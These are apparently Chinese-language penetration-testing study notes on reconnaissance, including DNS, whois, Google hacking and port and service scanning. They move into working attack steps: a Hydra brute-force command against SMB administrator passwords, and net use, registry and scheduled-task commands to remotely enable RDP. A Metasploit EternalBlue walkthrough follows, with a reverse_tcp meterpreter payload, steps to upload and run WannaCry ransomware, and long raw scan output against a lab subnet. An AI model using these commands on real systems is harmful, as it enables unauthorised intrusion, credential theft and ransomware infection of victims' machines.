情报搜集技术

情报搜集技术

• 外围信息搜索

  • 通过DNS和IP地址挖掘目标网络信息

    • nslookup根据域名查询IP

      • nslookup
      • DNS记录类型
        • A 记录 - 把一个域名解析为一个IPv4地址
        • AAAA记录 - 把一个域名解析为IPv6地址
        • PTR - 把一个IP地址解析成域名
        • CNAME - 把一个域名解析成另一个域名

    • whois域名注册信息查询 （中国-新网，阿里云）

      • 域名
      • 域名持有人
      • 域名持有人电话
      • 域名持有人邮箱
      • DNS服务器所属

    • IP2Location地理位置查询 - wwwmaxmind.com 通过IP地址查询服务器经纬度

      

    • 使用设备搜索引擎直接搜索目标信息

      • https://www.shodan.io
      • https://www.zoomeye.org

  • 通过搜索引擎进行信息搜集

    • Google Hacking技术
      • 在百度或google搜索特定字段获取有价值攻击点
      • inurl: - 搜索URL中包含某些字符的页面
      • filetype: - 搜索指定的文件类型
      • intext: - 搜索网页内容中包含某些字符的页面
    • 搜索网站的目录结构 - 对开放目录权限的web站点进行搜索来获取关键参数
      • .bak文件：脚本备份文件
      • .txt/.sql文件：网站的SQL脚本，透露数据库结构等信息
      • inc文件夹：包含网站配置信息，如数据库账户和密码
      • admin文件夹：后台管理目录
      • manage文件家：后台管理目录
    • 检索特定类型的文件
      • 对链接到网站上的文件进行搜索类获取关键信息 - admin.php/database.php
      • robots.txt - 网站不希望爬虫程序去爬的目录地址，一般是有价值的目录
    • 搜索网站中的E-mail地址 - 可为后续钓鱼邮件或者社工手段提供目标
    • 搜索存在的SQL注入点页面
      • 登陆页面
      • 详细内容页面 - URL中通过？来传递参数

• 主机探测与端口扫描

  • 活跃主机扫描

    • PINIG命令
    • 扫描工具 - Zenmap/Nmap

    

    • 扫描目标地址的整个C段类

  • 操作系统识别

    • 抓取数据包判断

    • 扫描工具

  • 端口扫描与服务类型探测

    • telnet 端口号，仅用于探测TCP端口
    • 扫描工具

• 服务扫描与查点

  • 常见网络服务扫描

    • Telnet服务扫描

      • 远程登录服务，允许网络中的用户远程以命令行方式控制本机

      • 端口TCP 23

    • SSH服务扫描

      • 更加安全的远程控制

      • 端口TCP22

    • 远程桌面

      • RDP服务

      • 端口TCP3389

    • FTP服务

      • 端口号TCP20、21

    • SMB

      • 文件共享服务，Windows端口445

      • Windows Server默认会开放整个磁盘的共享 \\ip\C$

    • WWW服务

      • HTTP 端口TCP80

      • HTTPS 端口TCP443

    • 数据库服务查点

      • MySQL: TCP 3306

      • SQLServer: TCP 1433

      • Oracle: TCP 1521

    • 开放代理探测与利用 - 隐藏真实IP地址

      • 端口8000、8080

  • 口令猜测与嗅探

    • SSH口令猜测

    • FTP口令猜测

    • 远程桌面口令猜测

    • TELNET口令猜测

    • Web后台登陆口令猜解

    • ......

    • 工具：Hydra

      hydra -l administrator -P /home/kali/Downloads/password.txt 192.168.50.210 smb 
      

      

    • 暴力破解

      • 使用穷举法来对密码进行逐个猜解

      • 使用字典来提高破解效率

    • 扫描提权步骤

      1. 通过nmap扫描目标地址段，获取目标IP地址，操作系统版本以及端口信息
      2. 使用Hydra破解Windows SMB服务的管理员账户密码
      3. 把开始3389的BAT程序通过C盘隐藏共享上传到目标主机
      4. 远程在目标主机上创建计划任务，定时执行BAT程序，使目标主机开启3389
      5. 使用远程桌面登陆目标主机，获取完全控制权

      cd/
      net use \\192.168.50.210\ipc$    //建立目标主机空连接
      net time \\192.168.50.210        //获取目标主机的系统时间
      
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f  //新建开启3389的bat脚本，上传到目标机器
      
      at \\192.168.50.210 09:19:00 c:\a.bat  //添加一个定时作业，自动执行3389开启命令
      

      高版本的SMB2已经修复该漏洞。

      

• 网络漏洞扫描

  • 扫描方式

    • 黑盒扫描
    • 白盒扫描

  • 扫描对象分类

    • 全面扫描主机安全漏洞

      • AWVS
      • AppScan
      • Tenable

    • 扫描特定漏洞

      • Metasploit
        1. 打开Metasploit
        2. msf>search ms17-010 \搜索ms17-010漏洞的利用模块
        3. msf>use auxiliary/scanner/smb/smb_ms17_010 \调用ms17-010漏洞扫描模块
        4. msf>auxiliary(scanner/smb/smb_ms17_010) set threads 20
        5. msf>auxiliary(scanner/smb/smb_ms17_010) set rhosts 192.168.50.0/24
        6. msf>auxiliary(scanner/smb/smb_ms17_010) run \\开始扫描
        7. 扫描结果出来后，开始攻击
        8. msf> exploit(windows/smb/ms17_010_eternalblue) \调用永恒之蓝漏洞攻击模块
        9. msf> exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/reverse_tcp
        10. msf> exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.50.210 \\设置攻击目标
        11. msf> exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.55 \\设置反弹目标
        12. msf> exploit(windows/smb/ms17_010_eternalblue) > exploit \\发起攻击
        13. 成功进入对方系统，获得对方系统控制权
        14. rdesktop IP 登陆系统
        15. meterpreter> upload c:\ wcry.ext c:\\ \\上传勒索病毒至对方计算机
        16. meterpreter> execute -f c:\wcry.exe \\执行勒索病毒

      ┌──(kali㉿kali)-[~]
      └─$ msfconsole
      [!] The following modules could not be loaded!..|
      [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/host_id.go
      [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/onprem_enum.go
      [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/msmail/exchange_enum.go
      [!]     /opt/metasploit/apps/pro/vendor/bundle/ruby/2.7.0/gems/metasploit-framework-6.1.5/modules/auxiliary/scanner/wproxy/att_open_proxy.py
      [!] Please see /home/kali/.msf4/logs/framework.log for details.
      
           ,           ,
          /             \
         ((__---,,,---__))
            (_) O O (_)_________
               \ _ /            |\
                o_o \   M S F   | \
                     \   _____  |  *
                      |||   WW|||
                      |||     |||
      
      
             =[ metasploit v6.1.5-dev                           ]
      + -- --=[ 2163 exploits - 1147 auxiliary - 367 post       ]
      + -- --=[ 596 payloads - 45 encoders - 10 nops            ]
      + -- --=[ 8 evasion                                       ]
      
      Metasploit tip: Use help <command> to learn more
      about any command
      
      msf6 > search MS17-010
      
      Matching Modules
      ================
      
         #  Name                                      Disclosure Date  Rank     Check  Description
         -  ----                                      ---------------  ----     -----  -----------
         0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
         1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
         2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
         3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
         4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
      
      
      Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
      
      msf6 > use auxiliary/scanner/smb/smb_ms17_010
      msf6 auxiliary(scanner/smb/smb_ms17_010) > set threads 20
      threads => 20
      msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.50.0/24
      rhosts => 192.168.50.0/24
      msf6 auxiliary(scanner/smb/smb_ms17_010) > run
      
      [-] 192.168.50.1:445      - Host does NOT appear vulnerable.
      [-] 192.168.50.8:445      - Rex::HostUnreachable: The host (192.168.50.8:445) was unreachable.
      [-] 192.168.50.10:445     - Rex::HostUnreachable: The host (192.168.50.10:445) was unreachable.
      [-] 192.168.50.2:445      - Rex::HostUnreachable: The host (192.168.50.2:445) was unreachable.
      [-] 192.168.50.4:445      - Rex::HostUnreachable: The host (192.168.50.4:445) was unreachable.
      [-] 192.168.50.9:445      - Rex::HostUnreachable: The host (192.168.50.9:445) was unreachable.
      [-] 192.168.50.5:445      - Rex::HostUnreachable: The host (192.168.50.5:445) was unreachable.
      [-] 192.168.50.11:445     - Rex::HostUnreachable: The host (192.168.50.11:445) was unreachable.
      [-] 192.168.50.13:445     - Rex::HostUnreachable: The host (192.168.50.13:445) was unreachable.
      [-] 192.168.50.12:445     - Rex::HostUnreachable: The host (192.168.50.12:445) was unreachable.
      [-] 192.168.50.6:445      - Rex::HostUnreachable: The host (192.168.50.6:445) was unreachable.
      [-] 192.168.50.0:445      - Rex::HostUnreachable: The host (192.168.50.0:445) was unreachable.
      [-] 192.168.50.3:445      - Rex::HostUnreachable: The host (192.168.50.3:445) was unreachable.
      [-] 192.168.50.18:445     - Rex::HostUnreachable: The host (192.168.50.18:445) was unreachable.
      [-] 192.168.50.7:445      - Rex::HostUnreachable: The host (192.168.50.7:445) was unreachable.
      [-] 192.168.50.19:445     - Rex::HostUnreachable: The host (192.168.50.19:445) was unreachable.
      [-] 192.168.50.15:445     - Rex::HostUnreachable: The host (192.168.50.15:445) was unreachable.
      [-] 192.168.50.17:445     - Rex::HostUnreachable: The host (192.168.50.17:445) was unreachable.
      [-] 192.168.50.14:445     - Rex::HostUnreachable: The host (192.168.50.14:445) was unreachable.
      [-] 192.168.50.16:445     - Rex::HostUnreachable: The host (192.168.50.16:445) was unreachable.
      [-] 192.168.50.20:445     - Rex::HostUnreachable: The host (192.168.50.20:445) was unreachable.
      [-] 192.168.50.21:445     - Rex::HostUnreachable: The host (192.168.50.21:445) was unreachable.
      [-] 192.168.50.33:445     - Rex::HostUnreachable: The host (192.168.50.33:445) was unreachable.
      [-] 192.168.50.25:445     - Rex::HostUnreachable: The host (192.168.50.25:445) was unreachable.
      [-] 192.168.50.29:445     - Rex::HostUnreachable: The host (192.168.50.29:445) was unreachable.
      [-] 192.168.50.36:445     - Rex::HostUnreachable: The host (192.168.50.36:445) was unreachable.
      [-] 192.168.50.26:445     - Rex::HostUnreachable: The host (192.168.50.26:445) was unreachable.
      [-] 192.168.50.22:445     - Rex::HostUnreachable: The host (192.168.50.22:445) was unreachable.
      [-] 192.168.50.34:445     - Rex::HostUnreachable: The host (192.168.50.34:445) was unreachable.
      [-] 192.168.50.24:445     - Rex::HostUnreachable: The host (192.168.50.24:445) was unreachable.
      [-] 192.168.50.35:445     - Rex::HostUnreachable: The host (192.168.50.35:445) was unreachable.
      [-] 192.168.50.37:445     - Rex::HostUnreachable: The host (192.168.50.37:445) was unreachable.
      [-] 192.168.50.28:445     - Rex::HostUnreachable: The host (192.168.50.28:445) was unreachable.
      [-] 192.168.50.23:445     - Rex::HostUnreachable: The host (192.168.50.23:445) was unreachable.
      [-] 192.168.50.38:445     - Rex::HostUnreachable: The host (192.168.50.38:445) was unreachable.
      [-] 192.168.50.32:445     - Rex::HostUnreachable: The host (192.168.50.32:445) was unreachable.
      [-] 192.168.50.27:445     - Rex::HostUnreachable: The host (192.168.50.27:445) was unreachable.
      [-] 192.168.50.30:445     - Rex::HostUnreachable: The host (192.168.50.30:445) was unreachable.
      [-] 192.168.50.31:445     - Rex::HostUnreachable: The host (192.168.50.31:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned  28 of 256 hosts (10% complete)
      [-] 192.168.50.39:445     - Rex::HostUnreachable: The host (192.168.50.39:445) was unreachable.
      [-] 192.168.50.40:445     - Rex::HostUnreachable: The host (192.168.50.40:445) was unreachable.
      [-] 192.168.50.41:445     - Rex::HostUnreachable: The host (192.168.50.41:445) was unreachable.
      [-] 192.168.50.51:445     - Rex::HostUnreachable: The host (192.168.50.51:445) was unreachable.
      [-] 192.168.50.54:445     - Rex::HostUnreachable: The host (192.168.50.54:445) was unreachable.
      [-] 192.168.50.48:445     - Rex::HostUnreachable: The host (192.168.50.48:445) was unreachable.
      [-] 192.168.50.47:445     - Rex::HostUnreachable: The host (192.168.50.47:445) was unreachable.
      [-] 192.168.50.52:445     - Rex::HostUnreachable: The host (192.168.50.52:445) was unreachable.
      [-] 192.168.50.59:445     - Rex::HostUnreachable: The host (192.168.50.59:445) was unreachable.
      [-] 192.168.50.42:445     - Rex::HostUnreachable: The host (192.168.50.42:445) was unreachable.
      [-] 192.168.50.56:445     - Rex::HostUnreachable: The host (192.168.50.56:445) was unreachable.
      [-] 192.168.50.49:445     - Rex::HostUnreachable: The host (192.168.50.49:445) was unreachable.
      [-] 192.168.50.58:445     - Rex::HostUnreachable: The host (192.168.50.58:445) was unreachable.
      [-] 192.168.50.53:445     - Rex::HostUnreachable: The host (192.168.50.53:445) was unreachable.
      [-] 192.168.50.57:445     - Rex::HostUnreachable: The host (192.168.50.57:445) was unreachable.
      [-] 192.168.50.43:445     - Rex::HostUnreachable: The host (192.168.50.43:445) was unreachable.
      [-] 192.168.50.46:445     - Rex::HostUnreachable: The host (192.168.50.46:445) was unreachable.
      [-] 192.168.50.55:445     - Rex::HostUnreachable: The host (192.168.50.55:445) was unreachable.
      [-] 192.168.50.44:445     - Rex::HostUnreachable: The host (192.168.50.44:445) was unreachable.
      [-] 192.168.50.50:445     - Rex::HostUnreachable: The host (192.168.50.50:445) was unreachable.
      [-] 192.168.50.45:445     - Rex::HostUnreachable: The host (192.168.50.45:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned  55 of 256 hosts (21% complete)
      [-] 192.168.50.60:445     - Rex::HostUnreachable: The host (192.168.50.60:445) was unreachable.
      [-] 192.168.50.61:445     - Rex::HostUnreachable: The host (192.168.50.61:445) was unreachable.
      [-] 192.168.50.68:445     - Rex::HostUnreachable: The host (192.168.50.68:445) was unreachable.
      [-] 192.168.50.62:445     - Rex::HostUnreachable: The host (192.168.50.62:445) was unreachable.
      [-] 192.168.50.65:445     - Rex::HostUnreachable: The host (192.168.50.65:445) was unreachable.
      [-] 192.168.50.64:445     - Rex::HostUnreachable: The host (192.168.50.64:445) was unreachable.
      [-] 192.168.50.63:445     - Rex::HostUnreachable: The host (192.168.50.63:445) was unreachable.
      [-] 192.168.50.74:445     - Rex::HostUnreachable: The host (192.168.50.74:445) was unreachable.
      [-] 192.168.50.71:445     - Rex::HostUnreachable: The host (192.168.50.71:445) was unreachable.
      [-] 192.168.50.66:445     - Rex::HostUnreachable: The host (192.168.50.66:445) was unreachable.
      [-] 192.168.50.72:445     - Rex::HostUnreachable: The host (192.168.50.72:445) was unreachable.
      [-] 192.168.50.79:445     - Rex::HostUnreachable: The host (192.168.50.79:445) was unreachable.
      [-] 192.168.50.69:445     - Rex::HostUnreachable: The host (192.168.50.69:445) was unreachable.
      [-] 192.168.50.76:445     - Rex::HostUnreachable: The host (192.168.50.76:445) was unreachable.
      [-] 192.168.50.70:445     - Rex::HostUnreachable: The host (192.168.50.70:445) was unreachable.
      [-] 192.168.50.77:445     - Rex::HostUnreachable: The host (192.168.50.77:445) was unreachable.
      [-] 192.168.50.73:445     - Rex::HostUnreachable: The host (192.168.50.73:445) was unreachable.
      [-] 192.168.50.78:445     - Rex::HostUnreachable: The host (192.168.50.78:445) was unreachable.
      [-] 192.168.50.67:445     - Rex::HostUnreachable: The host (192.168.50.67:445) was unreachable.
      [-] 192.168.50.75:445     - Rex::HostUnreachable: The host (192.168.50.75:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned  79 of 256 hosts (30% complete)
      [-] 192.168.50.80:445     - Rex::HostUnreachable: The host (192.168.50.80:445) was unreachable.
      [-] 192.168.50.81:445     - Rex::HostUnreachable: The host (192.168.50.81:445) was unreachable.
      [-] 192.168.50.85:445     - Rex::HostUnreachable: The host (192.168.50.85:445) was unreachable.
      [-] 192.168.50.82:445     - Rex::HostUnreachable: The host (192.168.50.82:445) was unreachable.
      [-] 192.168.50.83:445     - Rex::HostUnreachable: The host (192.168.50.83:445) was unreachable.
      [-] 192.168.50.86:445     - Rex::HostUnreachable: The host (192.168.50.86:445) was unreachable.
      [-] 192.168.50.84:445     - Rex::HostUnreachable: The host (192.168.50.84:445) was unreachable.
      [-] 192.168.50.88:445     - Rex::HostUnreachable: The host (192.168.50.88:445) was unreachable.
      [-] 192.168.50.89:445     - Rex::HostUnreachable: The host (192.168.50.89:445) was unreachable.
      [-] 192.168.50.87:445     - Rex::HostUnreachable: The host (192.168.50.87:445) was unreachable.
      [-] 192.168.50.99:445     - Rex::HostUnreachable: The host (192.168.50.99:445) was unreachable.
      [-] 192.168.50.90:445     - Rex::HostUnreachable: The host (192.168.50.90:445) was unreachable.
      [-] 192.168.50.96:445     - Rex::HostUnreachable: The host (192.168.50.96:445) was unreachable.
      [-] 192.168.50.94:445     - Rex::HostUnreachable: The host (192.168.50.94:445) was unreachable.
      [-] 192.168.50.93:445     - Rex::HostUnreachable: The host (192.168.50.93:445) was unreachable.
      [-] 192.168.50.97:445     - Rex::HostUnreachable: The host (192.168.50.97:445) was unreachable.
      [-] 192.168.50.91:445     - Rex::HostUnreachable: The host (192.168.50.91:445) was unreachable.
      [-] 192.168.50.92:445     - Rex::HostUnreachable: The host (192.168.50.92:445) was unreachable.
      [-] 192.168.50.98:445     - Rex::HostUnreachable: The host (192.168.50.98:445) was unreachable.
      [-] 192.168.50.100:445    - Rex::HostUnreachable: The host (192.168.50.100:445) was unreachable.
      [-] 192.168.50.101:445    - Rex::HostUnreachable: The host (192.168.50.101:445) was unreachable.
      [-] 192.168.50.105:445    - Rex::HostUnreachable: The host (192.168.50.105:445) was unreachable.
      [-] 192.168.50.102:445    - Rex::HostUnreachable: The host (192.168.50.102:445) was unreachable.
      [-] 192.168.50.103:445    - Rex::HostUnreachable: The host (192.168.50.103:445) was unreachable.
      [-] 192.168.50.106:445    - Rex::HostUnreachable: The host (192.168.50.106:445) was unreachable.
      [-] 192.168.50.104:445    - Rex::HostUnreachable: The host (192.168.50.104:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned 106 of 256 hosts (41% complete)
      [-] 192.168.50.109:445    - Rex::HostUnreachable: The host (192.168.50.109:445) was unreachable.
      [-] 192.168.50.107:445    - Rex::HostUnreachable: The host (192.168.50.107:445) was unreachable.
      [-] 192.168.50.108:445    - Rex::HostUnreachable: The host (192.168.50.108:445) was unreachable.
      [-] 192.168.50.111:445    - Rex::HostUnreachable: The host (192.168.50.111:445) was unreachable.
      [-] 192.168.50.113:445    - Rex::HostUnreachable: The host (192.168.50.113:445) was unreachable.
      [-] 192.168.50.116:445    - Rex::HostUnreachable: The host (192.168.50.116:445) was unreachable.
      [-] 192.168.50.110:445    - Rex::HostUnreachable: The host (192.168.50.110:445) was unreachable.
      [-] 192.168.50.112:445    - Rex::HostUnreachable: The host (192.168.50.112:445) was unreachable.
      [-] 192.168.50.114:445    - Rex::HostUnreachable: The host (192.168.50.114:445) was unreachable.
      [-] 192.168.50.117:445    - Rex::HostUnreachable: The host (192.168.50.117:445) was unreachable.
      [-] 192.168.50.115:445    - Rex::HostUnreachable: The host (192.168.50.115:445) was unreachable.
      [-] 192.168.50.118:445    - Rex::HostUnreachable: The host (192.168.50.118:445) was unreachable.
      [-] 192.168.50.119:445    - Rex::HostUnreachable: The host (192.168.50.119:445) was unreachable.
      [-] 192.168.50.124:445    - Rex::HostUnreachable: The host (192.168.50.124:445) was unreachable.
      [-] 192.168.50.121:445    - Rex::HostUnreachable: The host (192.168.50.121:445) was unreachable.
      [-] 192.168.50.122:445    - Rex::HostUnreachable: The host (192.168.50.122:445) was unreachable.
      [-] 192.168.50.123:445    - Rex::HostUnreachable: The host (192.168.50.123:445) was unreachable.
      [-] 192.168.50.125:445    - Rex::HostUnreachable: The host (192.168.50.125:445) was unreachable.
      [-] 192.168.50.120:445    - Rex::HostUnreachable: The host (192.168.50.120:445) was unreachable.
      [-] 192.168.50.126:445    - Rex::HostUnreachable: The host (192.168.50.126:445) was unreachable.
      [-] 192.168.50.128:445    - Rex::HostUnreachable: The host (192.168.50.128:445) was unreachable.
      [-] 192.168.50.127:445    - Rex::HostUnreachable: The host (192.168.50.127:445) was unreachable.
      [-] 192.168.50.129:445    - Rex::HostUnreachable: The host (192.168.50.129:445) was unreachable.
      [-] 192.168.50.130:445    - Rex::HostUnreachable: The host (192.168.50.130:445) was unreachable.
      [-] 192.168.50.133:445    - Rex::HostUnreachable: The host (192.168.50.133:445) was unreachable.
      [-] 192.168.50.134:445    - Rex::HostUnreachable: The host (192.168.50.134:445) was unreachable.
      [-] 192.168.50.131:445    - Rex::HostUnreachable: The host (192.168.50.131:445) was unreachable.
      [-] 192.168.50.136:445    - Rex::HostUnreachable: The host (192.168.50.136:445) was unreachable.
      [-] 192.168.50.135:445    - Rex::HostUnreachable: The host (192.168.50.135:445) was unreachable.
      [-] 192.168.50.132:445    - Rex::HostUnreachable: The host (192.168.50.132:445) was unreachable.
      [-] 192.168.50.95:445     - Rex::ConnectionTimeout: The connection with (192.168.50.95:445) timed out.
      [*] 192.168.50.0/24:445   - Scanned 137 of 256 hosts (53% complete)
      [-] 192.168.50.153:445    - Rex::ConnectionRefused: The connection was refused by the remote host (192.168.50.153:445).
      [-] 192.168.50.137:445    - Rex::HostUnreachable: The host (192.168.50.137:445) was unreachable.
      [-] 192.168.50.138:445    - Rex::HostUnreachable: The host (192.168.50.138:445) was unreachable.
      [-] 192.168.50.142:445    - Rex::HostUnreachable: The host (192.168.50.142:445) was unreachable.
      [-] 192.168.50.140:445    - Rex::HostUnreachable: The host (192.168.50.140:445) was unreachable.
      [-] 192.168.50.141:445    - Rex::HostUnreachable: The host (192.168.50.141:445) was unreachable.
      [-] 192.168.50.143:445    - Rex::HostUnreachable: The host (192.168.50.143:445) was unreachable.
      [-] 192.168.50.139:445    - Rex::HostUnreachable: The host (192.168.50.139:445) was unreachable.
      [-] 192.168.50.144:445    - Rex::HostUnreachable: The host (192.168.50.144:445) was unreachable.
      [-] 192.168.50.145:445    - Rex::HostUnreachable: The host (192.168.50.145:445) was unreachable.
      [-] 192.168.50.154:445    - Rex::HostUnreachable: The host (192.168.50.154:445) was unreachable.
      [-] 192.168.50.156:445    - Rex::HostUnreachable: The host (192.168.50.156:445) was unreachable.
      [-] 192.168.50.148:445    - Rex::HostUnreachable: The host (192.168.50.148:445) was unreachable.
      [-] 192.168.50.155:445    - Rex::HostUnreachable: The host (192.168.50.155:445) was unreachable.
      [-] 192.168.50.147:445    - Rex::HostUnreachable: The host (192.168.50.147:445) was unreachable.
      [-] 192.168.50.151:445    - Rex::HostUnreachable: The host (192.168.50.151:445) was unreachable.
      [-] 192.168.50.149:445    - Rex::HostUnreachable: The host (192.168.50.149:445) was unreachable.
      [-] 192.168.50.150:445    - Rex::HostUnreachable: The host (192.168.50.150:445) was unreachable.
      [-] 192.168.50.152:445    - Rex::HostUnreachable: The host (192.168.50.152:445) was unreachable.
      [-] 192.168.50.146:445    - Rex::HostUnreachable: The host (192.168.50.146:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned 157 of 256 hosts (61% complete)
      [-] 192.168.50.175:445    - An SMB Login Error occurred while connecting to the IPC$ tree.
      [-] 192.168.50.157:445    - Rex::HostUnreachable: The host (192.168.50.157:445) was unreachable.
      [-] 192.168.50.158:445    - Rex::HostUnreachable: The host (192.168.50.158:445) was unreachable.
      [-] 192.168.50.159:445    - Rex::HostUnreachable: The host (192.168.50.159:445) was unreachable.
      [-] 192.168.50.165:445    - Rex::HostUnreachable: The host (192.168.50.165:445) was unreachable.
      [-] 192.168.50.163:445    - Rex::HostUnreachable: The host (192.168.50.163:445) was unreachable.
      [-] 192.168.50.160:445    - Rex::HostUnreachable: The host (192.168.50.160:445) was unreachable.
      [-] 192.168.50.162:445    - Rex::HostUnreachable: The host (192.168.50.162:445) was unreachable.
      [-] 192.168.50.161:445    - Rex::HostUnreachable: The host (192.168.50.161:445) was unreachable.
      [-] 192.168.50.164:445    - Rex::HostUnreachable: The host (192.168.50.164:445) was unreachable.
      [-] 192.168.50.166:445    - Rex::HostUnreachable: The host (192.168.50.166:445) was unreachable.
      [-] 192.168.50.169:445    - Rex::HostUnreachable: The host (192.168.50.169:445) was unreachable.
      [-] 192.168.50.167:445    - Rex::HostUnreachable: The host (192.168.50.167:445) was unreachable.
      [-] 192.168.50.168:445    - Rex::HostUnreachable: The host (192.168.50.168:445) was unreachable.
      [-] 192.168.50.171:445    - Rex::HostUnreachable: The host (192.168.50.171:445) was unreachable.
      [-] 192.168.50.170:445    - Rex::HostUnreachable: The host (192.168.50.170:445) was unreachable.
      [-] 192.168.50.172:445    - Rex::HostUnreachable: The host (192.168.50.172:445) was unreachable.
      [-] 192.168.50.173:445    - Rex::HostUnreachable: The host (192.168.50.173:445) was unreachable.
      [-] 192.168.50.176:445    - Rex::HostUnreachable: The host (192.168.50.176:445) was unreachable.
      [-] 192.168.50.174:445    - Rex::HostUnreachable: The host (192.168.50.174:445) was unreachable.
      [-] 192.168.50.177:445    - Rex::HostUnreachable: The host (192.168.50.177:445) was unreachable.
      [-] 192.168.50.179:445    - Rex::HostUnreachable: The host (192.168.50.179:445) was unreachable.
      [-] 192.168.50.178:445    - Rex::HostUnreachable: The host (192.168.50.178:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned 180 of 256 hosts (70% complete)
      [-] 192.168.50.180:445    - Rex::HostUnreachable: The host (192.168.50.180:445) was unreachable.
      [-] 192.168.50.183:445    - Rex::HostUnreachable: The host (192.168.50.183:445) was unreachable.
      [-] 192.168.50.185:445    - Rex::HostUnreachable: The host (192.168.50.185:445) was unreachable.
      [-] 192.168.50.184:445    - Rex::HostUnreachable: The host (192.168.50.184:445) was unreachable.
      [-] 192.168.50.181:445    - Rex::HostUnreachable: The host (192.168.50.181:445) was unreachable.
      [-] 192.168.50.186:445    - Rex::HostUnreachable: The host (192.168.50.186:445) was unreachable.
      [-] 192.168.50.182:445    - Rex::HostUnreachable: The host (192.168.50.182:445) was unreachable.
      [-] 192.168.50.187:445    - Rex::HostUnreachable: The host (192.168.50.187:445) was unreachable.
      [-] 192.168.50.189:445    - Rex::HostUnreachable: The host (192.168.50.189:445) was unreachable.
      [-] 192.168.50.188:445    - Rex::HostUnreachable: The host (192.168.50.188:445) was unreachable.
      [-] 192.168.50.195:445    - Rex::HostUnreachable: The host (192.168.50.195:445) was unreachable.
      [-] 192.168.50.192:445    - Rex::HostUnreachable: The host (192.168.50.192:445) was unreachable.
      [-] 192.168.50.194:445    - Rex::HostUnreachable: The host (192.168.50.194:445) was unreachable.
      [-] 192.168.50.193:445    - Rex::HostUnreachable: The host (192.168.50.193:445) was unreachable.
      [-] 192.168.50.191:445    - Rex::HostUnreachable: The host (192.168.50.191:445) was unreachable.
      [-] 192.168.50.196:445    - Rex::HostUnreachable: The host (192.168.50.196:445) was unreachable.
      [-] 192.168.50.190:445    - Rex::HostUnreachable: The host (192.168.50.190:445) was unreachable.
      [-] 192.168.50.199:445    - Rex::HostUnreachable: The host (192.168.50.199:445) was unreachable.
      [-] 192.168.50.198:445    - Rex::HostUnreachable: The host (192.168.50.198:445) was unreachable.
      [-] 192.168.50.197:445    - Rex::HostUnreachable: The host (192.168.50.197:445) was unreachable.
      [-] 192.168.50.200:445    - Rex::HostUnreachable: The host (192.168.50.200:445) was unreachable.
      [-] 192.168.50.204:445    - Rex::HostUnreachable: The host (192.168.50.204:445) was unreachable.
      [-] 192.168.50.206:445    - Rex::HostUnreachable: The host (192.168.50.206:445) was unreachable.
      [-] 192.168.50.201:445    - Rex::HostUnreachable: The host (192.168.50.201:445) was unreachable.
      [-] 192.168.50.205:445    - Rex::HostUnreachable: The host (192.168.50.205:445) was unreachable.
      [-] 192.168.50.202:445    - Rex::HostUnreachable: The host (192.168.50.202:445) was unreachable.
      [-] 192.168.50.203:445    - Rex::HostUnreachable: The host (192.168.50.203:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned 206 of 256 hosts (80% complete)
      [-] 192.168.50.207:445    - Rex::HostUnreachable: The host (192.168.50.207:445) was unreachable.
      [-] 192.168.50.208:445    - Rex::HostUnreachable: The host (192.168.50.208:445) was unreachable.
      [-] 192.168.50.209:445    - Rex::HostUnreachable: The host (192.168.50.209:445) was unreachable.
      [-] 192.168.50.210:445    - Rex::HostUnreachable: The host (192.168.50.210:445) was unreachable.
      [-] 192.168.50.211:445    - Rex::HostUnreachable: The host (192.168.50.211:445) was unreachable.
      [-] 192.168.50.213:445    - Rex::HostUnreachable: The host (192.168.50.213:445) was unreachable.
      [-] 192.168.50.216:445    - Rex::HostUnreachable: The host (192.168.50.216:445) was unreachable.
      [-] 192.168.50.212:445    - Rex::HostUnreachable: The host (192.168.50.212:445) was unreachable.
      [-] 192.168.50.214:445    - Rex::HostUnreachable: The host (192.168.50.214:445) was unreachable.
      [-] 192.168.50.215:445    - Rex::HostUnreachable: The host (192.168.50.215:445) was unreachable.
      [-] 192.168.50.234:445    - Rex::ConnectionRefused: The connection was refused by the remote host (192.168.50.234:445).
      [-] 192.168.50.219:445    - Rex::HostUnreachable: The host (192.168.50.219:445) was unreachable.
      [-] 192.168.50.218:445    - Rex::HostUnreachable: The host (192.168.50.218:445) was unreachable.
      [-] 192.168.50.217:445    - Rex::HostUnreachable: The host (192.168.50.217:445) was unreachable.
      [-] 192.168.50.220:445    - Rex::HostUnreachable: The host (192.168.50.220:445) was unreachable.
      [-] 192.168.50.222:445    - Rex::HostUnreachable: The host (192.168.50.222:445) was unreachable.
      [-] 192.168.50.221:445    - Rex::HostUnreachable: The host (192.168.50.221:445) was unreachable.
      [-] 192.168.50.227:445    - Rex::HostUnreachable: The host (192.168.50.227:445) was unreachable.
      [-] 192.168.50.225:445    - Rex::HostUnreachable: The host (192.168.50.225:445) was unreachable.
